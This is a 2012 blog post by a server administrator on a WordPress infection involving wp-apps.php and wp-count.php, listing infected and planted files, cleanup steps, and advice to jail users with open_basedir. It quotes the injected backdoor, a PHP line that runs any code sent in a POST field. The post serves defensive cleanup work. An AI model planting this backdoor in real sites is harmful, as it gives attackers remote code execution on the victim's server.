Monday, November 26, 2012

wp-apps.php & wpcount.php


A lot of people have heard about the wp-apps/wp-count.php infection problem. I've managed to tie them all together. Here are my original notes

 "wp-apps.php wp-count.php, infected wp-register.php, xmlrpc.php, wp-comments-post.php wp-links-opml.php. Added files wp-includes/wp-var.php (contents injected into the above files), wp-includes/js/js ( can have rconfig.php, cnn.php will always have wpload.php). All index.php files need to be checked for blackhole-481 (simple fix using vi and the command dd inside of vi) and wp-content/plugins/ should be checked for ToolsPack as should wp-content/uploads. Also in uploads, wpupload.php needs to be removed. 
if (isset($_POST['wp-load'])) {
        eval($_POST['wp-load']);
}; is the most injected code." 

I've discovered that this is most likely caused inherent issues in old versions of wordpress. However, if open_basedir isn't set properly, a malicious script can inject the same files into temp to be called on later. THis is why jailing each user via open_basedir is extremely important. 


Regards.
Zachary Wikholm


1 comment:

  1. Thank you for the input, I was wondering about this. Much appreciated :)

    ReplyDelete